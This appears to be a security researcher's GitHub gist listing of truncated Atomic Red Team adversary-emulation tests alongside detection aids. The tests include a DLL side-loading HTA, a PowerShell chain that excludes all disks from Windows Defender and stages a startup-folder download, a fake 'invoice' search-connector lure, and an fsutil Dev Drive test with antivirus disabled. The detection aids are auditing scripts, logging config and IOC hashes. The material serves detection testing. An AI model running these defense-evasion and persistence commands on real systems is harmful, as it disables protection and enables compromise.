Skip to content

Instantly share code, notes, and snippets.

View MHaggis's full-sized avatar
:shipit:

Michael Haag MHaggis

:shipit:
358 followers · 86 following
View GitHub Profile
@MHaggis
MHaggis / AtomicDLLSide-Loading.hta
Created April 4, 2024 18:08
<html>
<head>
<title>Atomic Red Team - DLL Side-Loading HTA</title>
<HTA:APPLICATION ID="AtomicSideLoad" APPLICATIONNAME="AtomicSideLoad" BORDER="thin" BORDERSTYLE="normal" ICON="shell32.dll,4" >
<script language="VBScript">
Dim shell
Set shell = CreateObject("Wscript.Shell")
' Base64 encoded content of invite.zip - which is https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary">https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
Dim base64EncodedContent
@MHaggis
MHaggis / SlashAndGrab.ps1
Created February 27, 2024 14:33
Single Atomic Chain Reaction for Slash And Grab
## Chain Reaction
## Add all logical disks to Windows Defender exclusion list
Write-Output "Adding all logical disks to Windows Defender exclusion list"
foreach ($disk in Get-WmiObject Win32_Logicaldisk){
Add-MpPreference -ExclusionPath ($disk.deviceid + "\")
}
Start-Sleep -s 3
## Download and move a file to the startup folder
@MHaggis
MHaggis / SlashAndGrab.yaml
Last active February 27, 2024 14:48
Atomic Tests for Slash And Grab Post Exploitation - Some new, some old. Contribute to Atomic here https://github.com/redcanaryco/atomic-red-team/pulls
attack_technique: Many
display_name: Slash and Grab Post-Ex
atomic_tests:
- name: Add all logical disks to Windows Defender exclusion list
description: |
This test adds all logical disks on the system to the Windows Defender exclusion list.
supported_platforms:
- windows
executor:
command: |
@MHaggis
MHaggis / STRT_Attack_Range_nginx.md
Created February 23, 2024 14:07

STRT Attack Range Nginx.conf

The following is the base nginx.conf file utilized to proxy to applications. Note the most important part is the logging kv, in which we log as much data with. This is CIM compliant and does map to the Splunk Web Datamodel.

user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
@MHaggis
MHaggis / SACL Enablement.md
Created February 21, 2024 22:00

Modify, copy and paste the following with appropraite permissions to enable SACL object access on the ScreenConnect directories or App_Extensions directory.

# PowerShell script to enable auditing for event ID 4663 for all write operations to a specified path

# Define the path
$folderPath = "C:\Program Files (x86)\ScreenConnect\App_Extensions"

# Step 1: Enable Audit Policy
@MHaggis
MHaggis / Phomedrone-stealer-atomic-indicators.md
Created February 6, 2024 15:56 
38279fdad25c7972be9426cadb5ad5e3ee7e9761b0a41ed617945cb9a3713702
b7866dff1a56d27aa55caeeb55973fa76e30eedc1e3349fc3ddf5af810f23f72
35630220b3ae942a4c3061981f9205a897ead5b58936747ffda871babce93d55
c969e6bd943c6476eb441a70f17788fc24de61a08cc2c53cec97b384f17e4cf6
db6fa8cecd6ad1647773914e0f1b07a85ef6e1171e610069feb42122adbfea29
3f92262cdf4ed977b0c1137a5f011c67d665027b2e450867004c7e8409efc432
1fdd63b4b1db9637871a4f574c746980977accf2a0f6c3ceaef82b6641a3e9e7
97b467d4aabe790423c065f4fbb20f0e04a5af0002347c0e627726008cdd2aac
@MHaggis
MHaggis / yourinvoice.searchConnector-ms
Created January 3, 2024 15:21
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<iconReference>imageres.dll,-1021</iconReference>
<description>invoice</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<iconReference>http://<somewhereanywhere>/icon.ico</iconReference>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
@MHaggis
MHaggis / HVC_LOLDrivers_check_csv.ps1
Created November 21, 2023 02:44
Based on Trail of Bits HVCI LOLDrivers Check script - just outputs to csv
<#
.SYNOPSIS
Compares the HVCI block list on the current system against the list of
vulnerable and malicious drivers from loldrivers.io
Company: Trail of Bits
Author: Michael Lin
Contributors: Yarden Shafir
License: Apache 2
@MHaggis
MHaggis / T1059.yaml
Created November 8, 2023 18:22
You will need to create the T1059 folder in Atomics directory. Save this as a new yaml in that dir. A second folder under T1059 will be src. place the au3 file there.
attack_technique: T1059
display_name: Command and Scripting Interpreter
atomic_tests:
- name: AutoIt Message Box Test with Download and Extract
description: |
Downloads AutoIt to the temporary directory, extracts it, and executes an AutoIt script that shows a message box.
supported_platforms:
- windows
input_arguments:
autoit_script_path:
@MHaggis
MHaggis / T1562.001.yaml
Created November 8, 2023 17:32
T1562.001 Atomic Test - https://x.com/0gtweet/status/1720419490519752955?s=20 - https://x.com/Kostastsale/status/1721271281705001306?s=20
- name: Enable Dev Drive With Disabled AV Using Fsutil
description: |
This test simulates an adversary enabling a Developer Drive using fsutil.exe with arguments that disable antivirus (AV) on the created drive.
This technique requires administrative privileges and is relevant for Windows 11 environments starting with Build #10.0.22621.2338 or later.
The execution of this command should be closely monitored and flagged in production environments.
Ref. https://x.com/0gtweet/status/1720419490519752955?s=20 and https://x.com/Kostastsale/status/1721271281705001306?s=20
supported_platforms:
- windows